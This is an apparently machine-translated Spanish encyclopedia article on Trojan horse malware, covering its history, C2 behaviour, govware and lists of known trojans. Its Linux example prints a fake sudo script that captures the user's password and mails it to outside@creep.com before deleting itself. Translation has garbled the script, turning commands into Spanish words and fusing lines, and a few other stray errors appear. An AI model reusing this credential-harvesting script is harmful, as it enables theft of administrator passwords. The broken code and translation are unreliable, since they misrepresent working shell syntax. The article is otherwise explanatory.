Caballo de Troya (informática)

format_list_bulleted Contenido keyboard_arrow_down
ImprimirCitar

En informática, un caballo de Troya es cualquier malware que engaña a los usuarios sobre su verdadera intención. El término se deriva de la historia griega antigua del engañoso caballo de Troya que condujo a la caída de la ciudad de Troya.

Los troyanos generalmente se propagan mediante alguna forma de ingeniería social; por ejemplo, cuando se engaña a un usuario para que ejecute un archivo adjunto de correo electrónico disfrazado para parecer inocuo (por ejemplo, un formulario de rutina para completar), o al hacer clic en algún anuncio falso en las redes sociales o en cualquier otro lugar. Aunque su carga útil puede ser cualquier cosa, muchas formas modernas actúan como una puerta trasera, contactando a un controlador que luego puede tener acceso no autorizado a la computadora afectada. Los ataques de ransomware a menudo se llevan a cabo utilizando un troyano.

A diferencia de los virus y gusanos informáticos, los troyanos generalmente no intentan inyectarse en otros archivos ni propagarse de otra manera.

Uso del término

No está claro dónde o cuándo se utilizó por primera vez el concepto y este término, pero en 1971 el primer manual de Unix asumió que sus lectores conocían ambos:

Además, no se puede cambiar el propietario de un archivo con el set —user—ID bit on, de lo contrario uno podría crear Caballos de Troya capaces de utilizar indebidamente los archivos de otros.

Otra referencia temprana se encuentra en un informe de la Fuerza Aérea de EE. UU. de 1974 sobre el análisis de vulnerabilidad en los sistemas informáticos Multics.

Lo popularizó Ken Thompson en su conferencia de aceptación del Premio Turing de 1983 "Reflexiones sobre la confianza en la confianza", subtitulada: ¿Hasta qué punto se debe confiar en una afirmación de que un programa está libre de caballos de Troya? ? Quizás es más importante confiar en las personas que escribieron el software. Mencionó que sabía de la posible existencia de troyanos por un informe sobre la seguridad de Multics.

Comportamiento

Una vez instalados, los troyanos pueden realizar una variedad de acciones maliciosas. Muchos tienden a ponerse en contacto con uno o más servidores de comando y control (C2) a través de Internet y esperan instrucciones. Dado que los troyanos individuales suelen utilizar un conjunto específico de puertos para esta comunicación, puede ser relativamente sencillo detectarlos. Además, otro malware podría "tomar el control" el troyano, usándolo como un proxy para acciones maliciosas.

En los países de habla alemana, el spyware que utiliza o fabrica el gobierno a veces se denomina govware. Govware es típicamente un software troyano que se utiliza para interceptar las comunicaciones de la computadora de destino. Algunos países como Suiza y Alemania tienen un marco legal que rige el uso de dicho software. Ejemplos de troyanos govware incluyen el MiniPanzer y MegaPanzer suizos y el "troyano estatal" alemán. apodado R2D2. El govware alemán funciona explotando brechas de seguridad desconocidas para el público en general y accediendo a los datos de los teléfonos inteligentes antes de que se cifren a través de otras aplicaciones.

Debido a la popularidad de las botnets entre los piratas informáticos y la disponibilidad de servicios publicitarios que permiten a los autores violar las normas de los usuarios. privacidad, los troyanos son cada vez más comunes. Según una encuesta realizada por BitDefender entre enero y junio de 2009, "el malware de tipo troyano va en aumento y representa el 83 % del malware global detectado en el mundo". Los troyanos tienen una relación con los gusanos, ya que se propagan con la ayuda de los gusanos y viajan por Internet con ellos. BitDefender ha declarado que aproximadamente el 15% de las computadoras son miembros de una botnet, generalmente reclutada por una infección troyana.

Ejemplo de Linux

Un caballo de Troya es un programa que pretende realizar alguna función obvia, pero al ejecutarse compromete la seguridad del usuario. Un programa sencillo es una nueva versión del comando sudo de Linux. Luego, el comando se copia en un directorio de escritura pública como /tmp. Si un administrador se encuentra en ese directorio y ejecuta sudo, es posible que se ejecute el caballo de Troya. Aquí hay una versión de trabajo:

:
# Sudo#...# Apaga el eco de carácter a la pantalla.stty -echo

/bin/echo -n "Password for `whoami`: "leído x
/bin/echo "# Vuelve al eco del personaje.stty ecoeco $x Silencio correo -s "contraseña de whoami" outside@creep.com
dormir 1eco Lo siento.
rm $0Salida 0

Para evitar un caballo de Troya basado en la línea de comandos, configure la entrada . en la variable de entorno PATH= para que se ubique en la cola fin. Por ejemplo: RUTA=/usr/local/bin:/usr/bin:..

Ejemplos notables

Privada y gubernamental

(feminine)
  • ANOM - FBI
  • 0zapftis / r2d2 StaatsTrojaner – DigiTask
  • DarkComet – CIA / NSA
  • FinFisher – Lench IT solutions / Gamma International
  • DaVinci / Galileo RCS – HackingTeam
  • Linterna mágica - FBI
  • SUNBURST – SVR/Cozy Bear (suspeced)
  • TAO QUANTUM/FOXACID – NSA
  • PRIDE WARRIOR – GCHQ

Disponible públicamente

  • EGABTR – finales de 1980
  • Netbus – 1998 (publicado)
  • Sub7 de Mobman – 1999 (publicado)
  • Back Orifice – 1998 (publicado)
  • Bestia – 2002 (publicado)
  • Bifrost Trojan – 2004 (publicado)
  • DarkComet – 2008-2012 (publicado)
  • Blackhole exploit kit – 2012 (publicado)
  • Gh0st RAT – 2009 (publicado)
  • MegaPanzer BundesTrojaner – 2009 (publicado)
  • MEMZ de Leurak – 2016 (publicado)

Detectado por investigadores de seguridad

  • Doce trucos – 1990
  • Clickbot.A – 2006 (descubierta)
  • Zeus – 2007 (descubierta)
  • Flashback Trojan – 2011 (descubierta)
  • ZeroAccess – 2011 (descubierta)
  • Koobface – 2008 (descubierta)
  • Vundo – 2009 (descubierta)
  • Coreflood – 2010 (descubierta)
  • Tiny Banker Trojan – 2012 (descubierta)
  • SOVA - 2022 (descubierta)
  • Shedun Android malware – 2015 (descubierto)

Capitalización

El término informático "caballo de Troya" se deriva del legendario Caballo de Troya de la antigua ciudad de Troya. Por este motivo, "troyano" a menudo se escribe con mayúscula. Sin embargo, aunque las guías de estilo y los diccionarios difieren, muchos sugieren un "troyano" para uso normal.

Contenido relacionado

Verilog

Optimización del programa

En informática, optimización de programas, optimización de código u optimización de software, es el proceso de modificar un sistema de software para...

Manifiesto GNU

Más resultados...
Tamaño del texto:
undoredo
format_boldformat_italicformat_underlinedstrikethrough_ssuperscriptsubscriptlink
save